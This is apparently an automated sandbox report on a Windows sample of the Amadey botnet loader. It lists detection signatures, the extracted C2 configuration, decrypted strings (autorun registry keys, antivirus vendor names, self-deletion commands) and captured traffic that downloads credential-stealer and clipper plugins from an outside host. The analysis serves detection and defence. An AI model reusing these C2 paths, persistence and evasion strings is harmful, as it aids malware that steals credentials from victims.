Windows Analysis Report
GhLMDfzXqQ.exe

Overview

General Information

Sample name: GhLMDfzXqQ.exe
renamed because original name is a hash value
Original sample name: 11daaab30c6301d62d80a0bd038d4e87.exe
Analysis ID: 1427728
MD5: 11daaab30c6301d62d80a0bd038d4e87
SHA1: b5309987895d1912547356d9ed90c44fafb5e810
SHA256: 4b3214ca5ec9721278989a43bf21b9450e5b8597dae25a4262dbece4a1193351
Tags: Amadeyexe
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: GhLMDfzXqQ.exe Avira: detected
Found malware configuration
Source: 24.2.Dctooux.exe.400000.0.raw.unpack Malware Configuration Extractor: Amadey {"C2 url": "topgamecheats.dev/8bjndDcoA3/index.php", "Version": "4.19"}
Multi AV Scanner detection for domain / URL
Source: topgamecheats.dev Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1 Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?wal=1 Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/ Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.phpd5 Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/fud_new.exe Virustotal: Detection: 23% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.phpd Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/fud_new.exeLMEMP Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.php Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll Virustotal: Detection: 22% Perma Link
Source: topgamecheats.dev/8bjndDcoA3/index.php Virustotal: Detection: 22% Perma Link
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1# Virustotal: Detection: 22% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\fud_new[1].exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cred64[1].dll ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe ReversingLabs: Detection: 81%
Multi AV Scanner detection for submitted file
Source: GhLMDfzXqQ.exe ReversingLabs: Detection: 47%
Source: GhLMDfzXqQ.exe Virustotal: Detection: 44% Perma Link
Sample uses string decryption to hide its real strings
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: topgamecheats.dev
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: /8bjndDcoA3/index.php
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: S-%lu-
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: cbb1d94791
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Dctooux.exe
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Startup
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: cmd /C RMDIR /s/q
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: rundll32
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Programs
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: %USERPROFILE%
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: cred.dll|clip.dll|
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: http://
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: https://
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: /Plugins/
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: &unit=
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: shell32.dll
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: kernel32.dll
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: GetNativeSystemInfo
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ProgramData\
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: AVAST Software
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Kaspersky Lab
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Panda Security
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Doctor Web
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 360TotalSecurity
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Bitdefender
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Norton
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Sophos
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Comodo
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: WinDefender
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 0123456789
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ------
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ?scr=1
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ComputerName
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: -unicode-
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: VideoID
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: DefaultSettings.XResolution
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: DefaultSettings.YResolution
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ProductName
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: CurrentBuild
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: rundll32.exe
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: "taskkill /f /im "
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: " && timeout 1 && del
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: && Exit"
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: " && ren
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: Powershell.exe
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: shutdown -s -t 0
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: random
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ~L$v(g
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: ~L$v(g
Source: 24.2.Dctooux.exe.400000.0.raw.unpack String decryptor: 7FKeuO

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Unpacked PE file: 4.2.fud_new.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 24.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 36.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: GhLMDfzXqQ.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.36.dr, cred64.dll.36.dr
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00440EAD FindFirstFileExW, 4_2_00440EAD
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_04911114 FindFirstFileExW, 4_2_04911114
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00440EAD FindFirstFileExW, 24_2_00440EAD
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_04901114 FindFirstFileExW, 24_2_04901114
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00440EAD FindFirstFileExW, 36_2_00440EAD
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04951114 FindFirstFileExW, 36_2_04951114
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_6e74f07959bc23e75a6b77fd2553fb68ad4fabc_8822d4be_17748468-aec6-4998-b810-796a4d1a1ad0\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_c54a861aa4c43cc515c4d65c89eab2e3bda7e7c7_8822d4be_d2b7794f-7375-472a-8406-f114c8994e3a\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: topgamecheats.dev/8bjndDcoA3/index.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Sun, 14 Apr 2024 19:51:31 GMTetag: "661c33c3-6d000"accept-ranges: bytescontent-length: 446464date: Thu, 18 Apr 2024 00:16:54 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 3a d0 44 d1 5b be 17 d1 5b be 17 d1 5b be 17 cf 09 2b 17 c5 5b be 17 cf 09 3d 17 a4 5b be 17 cf 09 3a 17 fa 5b be 17 f6 9d c5 17 d2 5b be 17 d1 5b bf 17 a1 5b be 17 cf 09 34 17 d0 5b be 17 cf 09 2a 17 d0 5b be 17 cf 09 2f 17 d0 5b be 17 52 69 63 68 d1 5b be 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 71 19 f2 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d8 00 00 00 7a 84 02 00 00 00 00 41 19 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 84 02 00 04 00 00 3f 56 07 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c ce 05 00 28 00 00 00 00 10 84 02 a8 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 c7 05 00 18 00 00 00 d0 c6 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7d d6 00 00 00 10 00 00 00 d8 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 e7 04 00 00 f0 00 00 00 e8 04 00 00 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 16 7e 02 00 e0 05 00 00 22 00 00 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 cd 09 00 00 00 00 84 02 00 0a 00 00 00 e6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 df 00 00 00 10 84 02 00 e0 00 00 00 f0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Fri, 12 Apr 2024 22:39:08 GMTetag: "6619b80c-139c00"accept-ranges: bytescontent-length: 1285120date: Thu, 18 Apr 2024 00:18:10 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 db 8d 19 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 bc 0f 00 00 54 04 00 00 00 00 00 c8 00 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 40 89 12 00 58 00 00 00 98 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 70 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 d0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 ba 0f 00 00 10 00 00 00 bc 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 ce 02 00 00 d0 0f 00 00 d0 02 00 00 c0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac bb 00 00 00 a0 12 00 00 44 00 00 00 90 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 70 ad 00 00 00 60 13 00 00 ae 00 00 00 d4 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 82 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKcontent-type: application/octet-streamlast-modified: Fri, 12 Apr 2024 22:39:08 GMTetag: "6619b80c-1b600"accept-ranges: bytescontent-length: 112128date: Thu, 18 Apr 2024 00:18:16 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 dd 8d 19 66 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 4c 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 a0 01 00 9c 00 00 00 cc a0 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 bc 14 00 00 00 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 8f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 22 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 68 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwMDExHost: topgamecheats.devContent-Length: 100163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
